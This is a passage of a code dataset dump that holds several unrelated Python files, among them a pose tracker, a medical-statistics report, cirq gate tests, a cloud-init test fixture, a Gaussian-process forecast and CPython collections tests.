main()\n","repo_name":"Bl00dWolf/SimpleFileTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19122006969","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport sys\nimport time\nimport numpy as np\n\nimport pygame\n# Cargar OpenPose:\nsys.path.append('/usr/local/python')\nfrom openpose import *\n# from utils import poses2boxes\n# from pymongo import MongoClient\n# import json\n\nfrom deep_sort.iou_matching import iou_cost\nfrom deep_sort.kalman_filter import KalmanFilter\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker as DeepTracker\nfrom deep_sort import nn_matching\nfrom deep_sort import preprocessing\nfrom deep_sort.linear_assignment import min_cost_matching\nfrom deep_sort.detection import Detection as ddet\nfrom tools import generate_detections as gdet\nfrom utils import poses2boxes\n\nimport Constants\n\nclass Input():\n def __init__(self, debug = False):\n #from openpose import *\n params = dict()\n params[\"logging_level\"] = 3\n params[\"output_resolution\"] = \"-1x-1\"\n params[\"net_resolution\"] = \"160x160\"\n params[\"model_pose\"] = \"BODY_25\"\n params[\"alpha_pose\"] = 0.6\n params[\"scale_gap\"] = 0.3\n params[\"scale_number\"] = 1\n params[\"render_threshold\"] = 0.05\n params[\"num_gpu_start\"] = 0\n params[\"disable_blending\"] = False\n # Ensure you point to the correct path where models are located\n params[\"default_model_folder\"] = Constants.PATH + \"/models/\"\n self.openpose = OpenPose(params)\n\n max_cosine_distance = Constants.max_cosine_distance\n nn_budget = Constants.nn_budget\n self.nms_max_overlap = Constants.nms_max_overlap\n max_age = Constants.max_age\n n_init = Constants.n_init\n\n model_filename = 'model_data/mars-small128.pb'\n self.encoder = gdet.create_box_encoder(model_filename,batch_size=1)\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n self.tracker = DeepTracker(metric, max_age = max_age,n_init= n_init)\n\n self.capture = cv2.VideoCapture(0)\n if self.capture.isOpened(): # Checks the stream\n self.frameSize = (int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT)),\n int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH)))\n Constants.SCREEN_HEIGHT = self.frameSize[0]\n Constants.SCREEN_WIDTH = self.frameSize[1]\n\n\n def getCurrentFrameAsImage(self):\n frame = self.currentFrame\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n pgImg = pygame.image.frombuffer(frame.tostring(), frame.shape[1::-1], \"RGB\")\n return pgImg\n\n\n def run(self):\n result, self.currentFrame = self.capture.read()\n keypoints, self.currentFrame = self.openpose.forward(self.currentFrame, display = True)\n # print(keypoints)\n # Doesn't use keypoint confidence\n poses = keypoints[:,:,:2]\n # Get containing box for each seen body\n boxes = poses2boxes(poses)\n boxes_xywh = [[x1,y1,x2-x1,y2-y1] for [x1,y1,x2,y2] in boxes]\n features = self.encoder(self.currentFrame,boxes_xywh)\n # print(features)\n\n nonempty = lambda xywh: xywh[2] != 0 and xywh[3] != 0\n detections = [Detection(bbox, 1.0, feature, pose) for bbox, feature, pose in zip(boxes_xywh, features, poses) if nonempty(bbox)]\n # Run non-maxima suppression.\n boxes_det = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = preprocessing.non_max_suppression(boxes_det, self.nms_max_overlap, scores)\n detections = [detections[i] for i in indices]\n # Call the tracker\n self.tracker.predict()\n self.tracker.update( self.currentFrame, detections)\n\n for track in self.tracker.tracks:\n color = None\n if not track.is_confirmed():\n color = (0,0,255)\n else:\n color = (255,255,255)\n bbox = track.to_tlbr()\n cv2.rectangle(self.currentFrame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),color, 2)\n cv2.putText(self.currentFrame, \"id%s - ts%s\"%(track.track_id,track.time_since_update),(int(bbox[0]), int(bbox[1])-20),0, 5e-3 * 200, (0,255,0),2)\n\n\n # self.currentFrame = np.rot90(self.currentFrame)\n # self.currentFrame = cv2.flip(self.currentFrame, 1)\n # self.updateState()\n cv2.waitKey(1)\n","repo_name":"LHQ0308/liveposetracker","sub_path":"src/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"42477864666","text":"import logging\nimport click\n\nfrom fedlearner import settings\nfrom fedlearner.scheduler.db import db_model\nfrom fedlearner.scheduler.scheduler import Scheduler\n\n\n@click.group()\ndef scheduler():\n '''\n do action for scheduler in FedLearner.\n '''\n pass #pylint: disable=W0107\n\n\n@scheduler.command('init', help='initialize scheduler environment & database')\n@click.option('-c', '--config', required=False, type=click.File('r'))\ndef scheduler_initialize(config):\n '''\n FedLearner scheduler initialize environment parameter and database init.\n '''\n db_model.init_database_tables()\n\n\n@scheduler.command('start', help='start fedlearner scheduler service')\n@click.option('-p', '--port', type=int, default=50001)\n@click.option('-d', '--daemon_mode', type=bool, default=False)\ndef scheduler_start(port, daemon_mode):\n '''\n FedLearner scheduler service start.\n '''\n click.echo(settings.HEADER)\n scheduler = Scheduler()\n logging.getLogger().setLevel(logging.INFO)\n scheduler.run(listen_port=port)\n","repo_name":"saswat0/fedlearner","sub_path":"fedlearner/cli/commands/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"40426215119","text":"from PyQt4 import QtCore, QtGui\n\nfrom library.database import addDateInRange\nfrom library.MapCode import createMapCodeToRowIdx\nfrom library.Utils import forceBool, forceInt, forceString\n\nfrom Reports.Report import normalizeMKB, CReport\nfrom Reports.ReportBase import createTable, CReportBase\nfrom Reports.StatReport1NPUtil import havePermanentAttach\n\n\nColumns = [\n (u'A00-T98', u'всего'),\n (u'A00-B99', u'Некоторые инфекционные и паразитарные болезни'),\n (u'D50-D89', u'Болезни крови и кроветворных органов, отдельные нарушения, вовлекающие иммунный механизм'),\n (u'E00-E90', u'Болезни эндокринной системы, расстройства питания и нарушения обмена веществ'),\n (u'F00-F99', u'Психические расстройства и расстройства поведения'),\n (u'G00-G99', u'Болезни нервной системы'),\n (u'H00-H59', u'Болезни глаза и его придаточного органа'),\n (u'H60-H95', u'Болезни уха и сосцевидного отростка'),\n (u'I00-I99', u'Болезни системы кровообращения'),\n (u'I20-I25', u'в том числе: ишемическая болезнь сердца'),\n (u'I10-I15', u'в том числе: болезни, характеризующиеся повышенным кровяным давлением'),\n (u'J00-J99', u'Болезни органов дыхания'),\n (u'K00-K93', u'Болезни органов пищеварения'),\n (u'L00-L99', u'Болезни кожи и подкожной клетчатки'),\n (u'M00-M99', u'Болезни костно-мышечной системы и соединительной ткани'),\n (u'N00-N99', u'Болезни мочеполовой системы'),\n (u'D10-D36.9', u'Доброкачественные нововобразования'),\n (u'R00-R99', u'Симптомы, признаки и отклонения от нормы, выявленные при клинических и лабораторных исследованиях'),\n (u'S00-T98', u'Травмы, отравления и некоторые другие последствия воздействия внешних причин'),\n ]\n\nRows = [\n (u'Численность выявленных больных с данным заболеванием, установленным во время дополнительной диспансеризации', u'02'),\n (u'Численность выявленных больных, нуждающихся в амбулаторно-поликлинич. лечении (из числа выявленных больных стр. 02)', u'03'),\n (u'Численность пролеченных больных в амбулат.-поликлинич. условиях (из числа нуждающихся в лечении стр. 03)', u'04'),\n (u'Численность больных, нуждающихся в стационарн. лечении (из числа выявленных больных стр. 02)', u'05'),\n (u'Госпитализировано больных в стационары (из числа нуждающихся в госпитализации стр.05)', u'06'),\n ]\n\ndef selectData(begDate, endDate, eventTypeId, onlyPermanentAttach, onlyPayedEvents, begPayDate, endPayDate):\n stmt=\"\"\"\nSELECT\n Event.client_id AS client_id,\n Diagnosis.mkb AS mkb,\n IF((rbDiseaseCharacter.code='1' AND rbDiseaseStage.code='1') OR rbDiseaseCharacter.code='2', 1, 0) AS R2a,\n IF(rbDiseaseCharacter.code IS NOT NULL, 1, 0) AS R2b,\n IF(rbDiagnosisType.code='1', 1, 0) AS final,\n IF(rbHealthGroup.code = '3', 1, 0) AS R3c,\n IF(rbDispanser.observed OR rbDiagnosticResult.code='32', 1, 0) AS R4c,\n IF(rbHealthGroup.code > '3', 1, 0) AS R5c,\n IF(Diagnostic.hospital>1, 1, 0) AS R6c\nFROM\n Diagnostic\n LEFT JOIN Diagnosis ON Diagnosis.id = Diagnostic.diagnosis_id\n LEFT JOIN Event ON Event.id = Diagnostic.event_id\n LEFT JOIN Client ON Client.id = Event.client_id\n LEFT JOIN rbDiagnosisType ON rbDiagnosisType.id = Diagnostic.diagnosisType_id\n LEFT JOIN rbDiseaseCharacter ON rbDiseaseCharacter.id = Diagnostic.character_id\n LEFT JOIN rbDiseaseStage ON rbDiseaseStage.id = Diagnostic.stage_id\n LEFT JOIN rbHealthGroup ON rbHealthGroup.id = Diagnostic.healthGroup_id\n LEFT JOIN rbDispanser ON rbDispanser.id = Diagnostic.dispanser_id\n LEFT JOIN rbDiagnosticResult ON rbDiagnosticResult.id = Diagnostic.result_id\n LEFT JOIN Account_Item ON ( Account_Item.id = (SELECT max(AI.id) FROM Account_Item AS AI WHERE AI.event_id = Event.id AND AI.deleted=0 AND AI.date IS NOT NULL AND AI.refuseType_id IS NULL AND AI.reexposeItem_id IS NULL AND AI.visit_id IS NULL AND AI.action_id IS NULL)\n )\nWHERE\n Event.deleted=0 AND Diagnostic.deleted=0 AND %s\nORDER BY\n Event.client_id, Diagnosis.mkb, Diagnostic.diagnosisType_id, Diagnostic.id\n \"\"\"\n db = QtGui.qApp.db\n tableEvent = db.table('Event')\n cond = []\n addDateInRange(cond, tableEvent['execDate'], begDate, endDate)\n if eventTypeId:\n cond.append(tableEvent['eventType_id'].eq(eventTypeId))\n if onlyPermanentAttach:\n cond.append(havePermanentAttach(endDate))\n if onlyPayedEvents:\n cond.append('isEventPayed(Event.id)')\n tableAccountItem = db.table('Account_Item')\n addDateInRange(cond, tableAccountItem['date'], begPayDate, endPayDate)\n return db.query(stmt % (db.joinAnd(cond)))\n\n\nclass CStatReport1NP5000(CReport):\n def __init__(self, parent):\n CReport.__init__(self, parent)\n self.setPayPeriodVisible(True)\n self.setTitle(u'Итоги дополнительной диспансеризации граждан (5000)', u'Итоги дополнительной диспансеризации')\n\n\n def build(self, params):\n global Columns\n global Rows\n\n begDate = params.get('begDate', QtCore.QDate())\n endDate = params.get('endDate', QtCore.QDate())\n eventTypeId = params.get('eventTypeId', None)\n onlyPermanentAttach = params.get('onlyPermanentAttach', False)\n onlyPayedEvents = params.get('onlyPayedEvents', False)\n begPayDate = params.get('begPayDate', QtCore.QDate())\n endPayDate = params.get('endPayDate', QtCore.QDate())\n\n mapColumns = createMapCodeToRowIdx( [column[0] for column in Columns] )\n reportRowSize = len(Columns)\n reportData = [ [0] * reportRowSize for row in xrange(5) ]\n query = selectData(begDate, endDate, eventTypeId, onlyPermanentAttach, onlyPayedEvents, begPayDate, endPayDate)\n\n prevClientId = None\n clientData = None\n while query.next() :\n record = query.record()\n clientId = forceInt(record.value('client_id'))\n mkb = normalizeMKB(forceString(record.value('mkb')))\n r2 = forceBool(record.value('R2b'))\n final = forceBool(record.value('final'))\n r3 = final and r2 and forceBool(record.value('R3c'))\n r4 = final and r2 and forceBool(record.value('R4c'))\n r5 = final and r2 and forceBool(record.value('R5c'))\n r6 = r5 and forceBool(record.value('R6c'))\n\n if prevClientId != clientId:\n addClientData(reportData, clientData)\n clientData = [ [False] * reportRowSize for row in xrange(5) ]\n prevClientId = clientId\n\n diagColumns = mapColumns.get(mkb, [])\n if not r2 and diagColumns:\n pass\n if r2:\n setSigns(clientData, 0, diagColumns)\n if r3:\n setSigns(clientData, 1, diagColumns)\n if r4:\n setSigns(clientData, 2, diagColumns)\n if r5:\n setSigns(clientData, 3, diagColumns)\n if r6:\n setSigns(clientData, 4, diagColumns)\n addClientData(reportData, clientData)\n\n\n # now text\n doc = QtGui.QTextDocument()\n cursor = QtGui.QTextCursor(doc)\n\n cursor.setCharFormat(CReportBase.ReportTitle)\n cursor.insertText(u'Итоги дополнительной диспансеризации граждан')\n cursor.insertBlock()\n self.dumpParams(cursor, params)\n cursor.insertText(u'(5000)')\n cursor.insertBlock()\n\n tableColumns = [\n ('15%', [u'Наименование заболевания', u'', u'1', u'Код по МКБ-10'], CReportBase.AlignLeft),\n ('4.2%', [u'№ строки', u'', u'2', '01'], CReportBase.AlignCenter),\n ('4.2%', [Columns[0][1], u'', u'3', Columns[0][0]], CReportBase.AlignRight),\n ]\n tableColumns.extend([('4.2%', [u'', Columns[i][1], str(i+3), Columns[i][0]], CReportBase.AlignRight) for i in xrange(1, len(Columns))])\n\n table = createTable(cursor, tableColumns)\n table.mergeCells(0, 0, 2, 1)\n table.mergeCells(0, 1, 2, 1)\n table.mergeCells(0, 2, 2, 1)\n table.mergeCells(0, 3, 1, len(Columns)-1)\n\n for iRow, row in enumerate(Rows):\n i = table.addRow()\n for j in xrange(2):\n table.setText(i, j, row[j], CReportBase.TableHeader)\n for j in xrange(reportRowSize):\n table.setText(i, 2+j, reportData[iRow][j])\n return doc\n\ndef setSigns(clientData, row, columns):\n clientLine = clientData[row]\n for column in columns:\n clientLine[column] = True\n\ndef addClientData(reportData, clientData):\n if clientData:\n for row, clientLine in enumerate(clientData):\n reportLine = reportData[row]\n for column, sign in enumerate(clientLine):\n if sign:\n reportLine[column] += 1\n","repo_name":"dio4/vista_1","sub_path":"Reports/StatReport1NP5000.py","file_name":"StatReport1NP5000.py","file_ext":"py","file_size_in_byte":10310,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30337329766","text":"# -*- coding: utf-8 -*-\n# A - Round Up the Mean\n# https://atcoder.jp/contests/abc082/tasks/abc082_a\n\na, b = map(int, input().split())\ncalc = int((a + b) / 2)\ncheck = (a + b) % 2\n\nif check == 0:\n print(calc)\nelse:\n calc += 1\n print(calc)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_A/ABC082A.py","file_name":"ABC082A.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22175167616","text":"import cirq\nimport cirq.contrib.acquaintance as cca\n\n\ndef test_circular_shift_gate_init():\n g = cca.CircularShiftGate(4, 2)\n assert g.num_qubits() == 4\n assert g.shift == 2\n\n g = cca.CircularShiftGate(4, 1, swap_gate=cirq.CZ)\n assert g.swap_gate == cirq.CZ\n\n\ndef test_circular_shift_gate_eq():\n equals_tester = cirq.testing.EqualsTester()\n equals_tester.add_equality_group(cca.CircularShiftGate(4, 1), cca.CircularShiftGate(4, 1))\n equals_tester.add_equality_group(cca.CircularShiftGate(4, 1, swap_gate=cirq.CZ))\n equals_tester.add_equality_group(cca.CircularShiftGate(4, 2))\n equals_tester.add_equality_group(cca.CircularShiftGate(3, 2))\n equals_tester.add_equality_group(cca.CircularShiftGate(3, 2, swap_gate=cirq.CZ))\n\n\ndef test_circular_shift_gate_permutation():\n assert cca.CircularShiftGate(3, 4).permutation() == {0: 2, 1: 0, 2: 1}\n assert cca.CircularShiftGate(4, 0).permutation() == {0: 0, 1: 1, 2: 2, 3: 3}\n\n assert cca.CircularShiftGate(5, 2).permutation() == {0: 3, 1: 4, 2: 0, 3: 1, 4: 2}\n\n\ndef test_circular_shift_gate_repr():\n g = cca.CircularShiftGate(3, 2)\n cirq.testing.assert_equivalent_repr(g)\n\n\ndef test_circular_shift_gate_decomposition():\n qubits = [cirq.NamedQubit(q) for q in 'abcdef']\n\n circular_shift = cca.CircularShiftGate(2, 1, cirq.CZ)(*qubits[:2])\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift))\n expected_circuit = cirq.Circuit((cirq.Moment((cirq.CZ(*qubits[:2]),)),))\n assert circuit == expected_circuit\n\n no_decomp = lambda op: (isinstance(op, cirq.GateOperation) and op.gate == cirq.SWAP)\n circular_shift = cca.CircularShiftGate(6, 3)(*qubits)\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift), no_decomp=no_decomp)\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\na: ───────────×───────────\n │\nb: ───────×───×───×───────\n │ │\nc: ───×───×───×───×───×───\n │ │ │\nd: ───×───×───×───×───×───\n │ │\ne: ───────×───×───×───────\n │\nf: ───────────×───────────\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n circular_shift = cca.CircularShiftGate(6, 2)(*qubits)\n circuit = cirq.expand_composite(cirq.Circuit(circular_shift), no_decomp=no_decomp)\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\na: ───────×───────────────\n │\nb: ───×───×───×───────────\n │ │\nc: ───×───×───×───×───────\n │ │\nd: ───────×───×───×───×───\n │ │\ne: ───────────×───×───×───\n │\nf: ───────────���───×───────\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n\ndef test_circular_shift_gate_wire_symbols():\n qubits = [cirq.NamedQubit(q) for q in 'xyz']\n circuit = cirq.Circuit(cca.CircularShiftGate(3, 2)(*qubits))\n actual_text_diagram = circuit.to_text_diagram().strip()\n expected_text_diagram = \"\"\"\nx: ───╲0╱───\n │\ny: ───╲1╱───\n │\nz: ───╱2╲───\n \"\"\".strip()\n assert actual_text_diagram == expected_text_diagram\n\n actual_text_diagram = circuit.to_text_diagram(use_unicode_characters=False)\n expected_text_diagram = r\"\"\"\nx: ---\\0/---\n |\ny: ---\\1/---\n |\nz: ---/2\\---\n \"\"\".strip()\n assert actual_text_diagram.strip() == expected_text_diagram\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/contrib/acquaintance/shift_test.py","file_name":"shift_test.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"11452426806","text":"import re\nimport numpy as np\nalphabets= \"([A-Za-z])\"\nprefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\nsuffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\nstarters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\nacronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\nwebsites = \"[.](com|net|org|io|gov)\"\n\nclass Utils:\n\n @staticmethod\n def split_into_sentences(text):\n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1\",text)\n text = re.sub(websites,\"\\\\1\",text)\n if \"Ph.D\" in text: text = text.replace(\"Ph.D.\",\"PhD\")\n text = re.sub(\"\\s\" + alphabets + \"[.] \",\" \\\\1 \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1 \\\\2\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\\\\3\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.] \"+starters,\" \\\\1 \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1\",text)\n text = re.sub(\" \" + alphabets + \"[.]\",\" \\\\1\",text)\n if \"”\" in text: text = text.replace(\".”\",\"”.\")\n if \"\\\"\" in text: text = text.replace(\".\\\"\",\"\\\".\")\n if \"!\" in text: text = text.replace(\"!\\\"\",\"\\\"!\")\n if \"?\" in text: text = text.replace(\"?\\\"\",\"\\\"?\")\n text = text.replace(\".\",\".\")\n text = text.replace(\"?\",\"?\")\n text = text.replace(\"!\",\"!\")\n text = text.replace(\"\",\".\")\n sentences = text.split(\"\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n return sentences\n @staticmethod\n def largest_indices(ary, n):\n \"\"\"Returns the n largest indices from a numpy array.\"\"\"\n flat = ary.flatten()\n indices = np.argpartition(flat, -n)[-n:]\n indices = indices[np.argsort(-flat[indices])]\n return np.unravel_index(indices, ary.shape)\n","repo_name":"MathewAlexander/web_similarity","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10094326504","text":"from unittest import mock\n\nimport pytest\n\nfrom cloudinit import subp\n\n\n@pytest.yield_fixture(autouse=True)\ndef disable_subp_usage(request):\n \"\"\"\n Across all (pytest) tests, ensure that subp.subp is not invoked.\n\n Note that this can only catch invocations where the util module is imported\n and ``subp.subp(...)`` is called. ``from cloudinit.subp mport subp``\n imports happen before the patching here (or the CiTestCase monkey-patching)\n happens, so are left untouched.\n\n To allow a particular test method or class to use subp.subp you can set the\n parameter passed to this fixture to False using pytest.mark.parametrize::\n\n @pytest.mark.parametrize(\"disable_subp_usage\", [False], indirect=True)\n def test_whoami(self):\n subp.subp([\"whoami\"])\n\n To instead allow subp.subp usage for a specific command, you can set the\n parameter passed to this fixture to that command:\n\n @pytest.mark.parametrize(\"disable_subp_usage\", [\"bash\"], indirect=True)\n def test_bash(self):\n subp.subp([\"bash\"])\n\n To specify multiple commands, set the parameter to a list (note the\n double-layered list: we specify a single parameter that is itself a list):\n\n @pytest.mark.parametrize(\n \"disable_subp_usage\", [\"bash\", \"whoami\"], indirect=True)\n def test_several_things(self):\n subp.subp([\"bash\"])\n subp.subp([\"whoami\"])\n\n This fixture (roughly) mirrors the functionality of\n CiTestCase.allowed_subp. N.B. While autouse fixtures do affect non-pytest\n tests, CiTestCase's allowed_subp does take precedence (and we have\n TestDisableSubpUsageInTestSubclass to confirm that).\n \"\"\"\n should_disable = getattr(request, \"param\", True)\n if should_disable:\n if not isinstance(should_disable, (list, str)):\n def side_effect(args, *other_args, **kwargs):\n raise AssertionError(\"Unexpectedly used subp.subp\")\n else:\n # Look this up before our patch is in place, so we have access to\n # the real implementation in side_effect\n real_subp = subp.subp\n\n if isinstance(should_disable, str):\n should_disable = [should_disable]\n\n def side_effect(args, *other_args, **kwargs):\n cmd = args[0]\n if cmd not in should_disable:\n raise AssertionError(\n \"Unexpectedly used subp.subp to call {} (allowed:\"\n \" {})\".format(cmd, \",\".join(should_disable))\n )\n return real_subp(args, *other_args, **kwargs)\n\n with mock.patch('cloudinit.subp.subp', autospec=True) as m_subp:\n m_subp.side_effect = side_effect\n yield\n else:\n yield\n","repo_name":"baihonglei-git/cloud-init","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37821601098","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 25 00:42:12 2021\n\n@author: seongjoon kang\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pylab as plt\nfrom sklearn.metrics import mean_squared_error\nimport time\nimport random\nfrom sklearn import gaussian_process\nfrom sklearn.gaussian_process.kernels import RBF, Matern, WhiteKernel\nfrom sklearn.gaussian_process.kernels import ConstantKernel, ExpSineSquared,DotProduct\nnp.random.seed(12)\n\n\n\ndata = pd.read_csv('jj.csv')\ndata = np.array(data)\nall_x = data[:,0]\ny_all = data[:,1]\n\ntest_ind1 = (np.arange(1970, 1975) - 1960)*4\ntest_ind1 = np.arange(min(test_ind1), max(test_ind1))\ntest_ind2 = (np.arange(1980, 1991) - 1960) *4\ntest_ind2 = np.arange(min(test_ind2), max(test_ind2))\n# indices of test data\ntest_ind = np.append(test_ind1, test_ind2)\n# indices of train data\ntrain_ind = list (set(all_x) - set(test_ind))\ntrain_ind = np.array(train_ind, dtype= int)\n# get train data from the whole data\nX_train = all_x[train_ind-1]\nbeta_inv = .01\nX_train = np.array(X_train, dtype = int)\ny_train = data[X_train-1][:,1] +np.random.randn(len(X_train))*np.sqrt(beta_inv)#generative_func(X_train)+np.random.randn(len(X_train))*np.sqrt(beta_inv)\n\nplt.figure()\nplt.plot(all_x, y_all, label='true function')\nplt.plot(X_train, y_train, '.r', label='training sample (noisy)')\nplt.title(\"Totla Data and Train Data\")\nplt.xlabel('x')\nplt.xticks(np.arange(len(all_x), step = 20), np.arange(1960, 1985, step = 5))\nplt.grid()\nplt.ylabel('y')\nplt.legend()\nplt.savefig('data.png')\n\nkernel = 4*RBF(length_scale=20) + 11*ExpSineSquared(periodicity= 10,length_scale=1.1)*RBF(length_scale=13) + 3*WhiteKernel()\n#kernel = 0.0015*DotProduct() + ExpSineSquared(periodicity= 10,length_scale=1.1) \\\n#+ 3*RBF(length_scale = 20) + WhiteKernel()\nplt.figure()\nplt.imshow(kernel(np.array([all_x]).T))\nplt.colorbar()\nplt.title('kernel pre-fitting')\nplt.savefig('kernel_pre_fitting.png')\n\ngp = gaussian_process.GaussianProcessRegressor(kernel=kernel,normalize_y=True, \n alpha=0, n_restarts_optimizer=200)\ngp.fit(X_train.reshape(-1,1), y_train.reshape(-1,1))\nprint (gp.kernel_)\nplt.figure()\nplt.imshow(gp.kernel_(np.array([all_x]).T))\nplt.colorbar()\nplt.title('kernel post-fitting')\nplt.savefig('kernel_post-fitting')\n\n\nplt.figure()\nall_x2 = np.append(all_x, np.arange(85, 120))\nmus, sigmas = gp.predict(all_x2.reshape(-1,1), return_std=True)\n#plt.plot(all_x2, mus[:,0]+ np.sqrt(sigmas),'k',lw = 0.5)\n#plt.plot(all_x2, mus[:,0]- np.sqrt(sigmas),'k',lw = 0.5)\nplt.plot(all_x2, mus[:,0],'k', label = 'predicted mean')\nplt.fill_between(all_x2, y1 = mus[:,0] + np.sqrt(sigmas), y2 =mus[:,0]- np.sqrt(sigmas), \n color='r', label = 'confident range of predicted values')\nplt.plot(all_x, y_all, 'b', label = 'original data')\n\n\nplt.xticks(np.arange(0,len(all_x2)+20, step = 20), np.arange(1960, 1995, step = 5))\nplt.xlabel ('Year')\nplt.ylabel ('Earning')\nplt.title ('Johnson&Johnson Data')\nplt.legend()\nplt.grid()\nplt.savefig('final_predition.png')","repo_name":"sk8053/useful_work","sub_path":"probablistic_time_seris_labs_DS_GA_1018/gaussian_process_example.py","file_name":"gaussian_process_example.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1718121112","text":"import unittest, doctest\nfrom test import test_support\nfrom collections import namedtuple\nimport pickle, cPickle, copy\nfrom collections import Hashable, Iterable, Iterator\nfrom collections import Sized, Container, Callable\nfrom collections import Set, MutableSet\nfrom collections import Mapping, MutableMapping\nfrom collections import Sequence, MutableSequence\n\nTestNT = namedtuple('TestNT', 'x y z') # type used for pickle tests\n\nclass TestNamedTuple(unittest.TestCase):\n\n def test_factory(self):\n Point = namedtuple('Point', 'x y')\n self.assertEqual(Point.__name__, 'Point')\n self.assertEqual(Point.__doc__, 'Point(x, y)')\n self.assertEqual(Point.__slots__, ())\n self.assertEqual(Point.__module__, __name__)\n self.assertEqual(Point.__getitem__, tuple.__getitem__)\n self.assertEqual(Point._fields, ('x', 'y'))\n\n self.assertRaises(ValueError, namedtuple, 'abc%', 'efg ghi') # type has non-alpha char\n self.assertRaises(ValueError, namedtuple, 'class', 'efg ghi') # type has keyword\n self.assertRaises(ValueError, namedtuple, '9abc', 'efg ghi') # type starts with digit\n\n self.assertRaises(ValueError, namedtuple, 'abc', 'efg g%hi') # field with non-alpha char\n self.assertRaises(ValueError, namedtuple, 'abc', 'abc class') # field has keyword\n self.assertRaises(ValueError, namedtuple, 'abc', '8efg 9ghi') # field starts with digit\n self.assertRaises(ValueError, namedtuple, 'abc', '_efg ghi') # field with leading underscore\n self.assertRaises(ValueError, namedtuple, 'abc', 'efg efg ghi') # duplicate field\n\n namedtuple('Point0', 'x1 y2') # Verify that numbers are allowed in names\n namedtuple('_', 'a b c') # Test leading underscores in a typename\n\n nt = namedtuple('nt', u'the quick brown fox') # check unicode input\n self.assert_(\"u'\" not in repr(nt._fields))\n nt = namedtuple('nt', (u'the', u'quick')) # check unicode input\n self.assert_(\"u'\" not in repr(nt._fields))\n\n self.assertRaises(TypeError, Point._make, [11]) # catch too few args\n self.assertRaises(TypeError, Point._make, [11, 22, 33]) # catch too many args\n\n def test_instance(self):\n Point = namedtuple('Point', 'x y')\n p = Point(11, 22)\n self.assertEqual(p, Point(x=11, y=22))\n self.assertEqual(p, Point(11, y=22))\n self.assertEqual(p, Point(y=22, x=11))\n self.assertEqual(p, Point(*(11, 22)))\n self.assertEqual(p, Point(**dict(x=11, y=22)))\n self.assertRaises(TypeError, Point, 1) # too few args\n self.assertRaises(TypeError, Point, 1, 2, 3) # too many args\n self.assertRaises(TypeError, eval, 'Point(XXX=1, y=2)', locals()) # wrong keyword argument\n self.assertRaises(TypeError, eval, 'Point(x=1)', locals()) # missing keyword argument\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n self.assert_('__dict__' not in dir(p)) # verify instance has no dict\n self.assert_('__weakref__' not in dir(p))\n self.assertEqual(p, Point._make([11, 22])) # test _make classmethod\n self.assertEqual(p._fields, ('x', 'y')) # test _fields attribute\n self.assertEqual(p._replace(x=1), (1, 22)) # test _replace method\n self.assertEqual(p._asdict(), dict(x=11, y=22)) # test _asdict method\n\n try:\n p._replace(x=1, error=2)\n except ValueError:\n pass\n else:\n self._fail('Did not detect an incorrect fieldname')\n\n # verify that field string can have commas\n Point = namedtuple('Point', 'x, y')\n p = Point(x=11, y=22)\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n\n # verify that fieldspec can be a non-string sequence\n Point = 